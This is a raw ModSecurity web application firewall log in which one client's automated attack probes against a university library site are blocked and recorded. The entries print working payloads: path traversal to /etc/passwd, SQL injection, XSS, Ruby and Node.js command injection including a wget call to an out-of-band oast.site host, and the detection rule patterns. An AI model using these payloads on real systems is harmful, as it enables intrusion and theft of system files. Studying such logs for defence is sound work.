[Tue Aug 29 11:43:50.466987 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdb7tgAAAAb"]
[Tue Aug 29 11:43:51.385382 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAenGcUAAAAM"]
[Tue Aug 29 11:43:55.365120 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfWNzgAAAAL"]
[Tue Aug 29 11:43:55.684696 2023] [:error] [pid 2015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAffoqwAAAAd"]
[Tue Aug 29 11:43:56.400224 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAdOeXcAAAAS"]
[Tue Aug 29 11:43:57.367389 2023] [:error] [pid 2017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfhHKUAAAAf"]
[Tue Aug 29 11:43:58.379049 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfky78AAAAi"]
[Tue Aug 29 11:43:59.367624 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAdftdgAAAAG"]
[Tue Aug 29 11:44:03.522098 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAcsLQUAAAAE"]
[Tue Aug 29 11:44:03.723055 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAenGd4AAAAM"]
[Tue Aug 29 11:44:07.472547 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAdeQ9UAAAAQ"]
[Tue Aug 29 11:44:08.394063 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAdQ3o4AAAAV"]
[Tue Aug 29 11:44:08.442755 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfZj2oAAAAN"]
[Tue Aug 29 11:44:10.628362 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAdTBKQAAAAY"]
[Tue Aug 29 11:44:13.355724 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAfg7w8AAAAe"]
[Tue Aug 29 11:44:14.447565 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAftVDgAAAAf"]
[Tue Aug 29 11:44:16.402369 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26g59e7we6kae69k.oast.site found within TX:1: cjmnbitjmimt14dgn26g59e7we6kae69k.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAfVkY4AAAAD"]
[Tue Aug 29 11:44:18.408600 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfEByEAAAAO"]
[Tue Aug 29 11:44:20.394648 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gh317nxg76zydo.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfiYmoAAAAg"]
[Tue Aug 29 11:44:23.560858 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdOeawAAAAS"]
[Tue Aug 29 11:44:26.381567 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAcsLUQAAAAE"]
[Tue Aug 29 11:44:27.364315 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAcsLUgAAAAE"]
[Tue Aug 29 11:44:29.496399 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAdQ3roAAAAV"]
[Tue Aug 29 11:44:32.496434 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAenGhkAAAAM"]
[Tue Aug 29 11:44:35.396082 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gej54ukuy9hdx9.oast.site found within TX:1: cjmnbitjmimt14dgn26gej54ukuy9hdx9.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAe3@D0AAAAA"]
[Tue Aug 29 11:44:35.434902 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAgzyPQAAAAF"]
[Tue Aug 29 11:44:43.464152 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAdftk0AAAAG"]
[Tue Aug 29 11:44:44.425349 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAdftlMAAAAG"]
[Tue Aug 29 11:44:47.377056 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAhISOAAAAAH"]
[Tue Aug 29 11:44:47.660157 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAg4DcYAAAAI"]
[Tue Aug 29 11:44:48.387427 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAfSWeQAAAAB"]
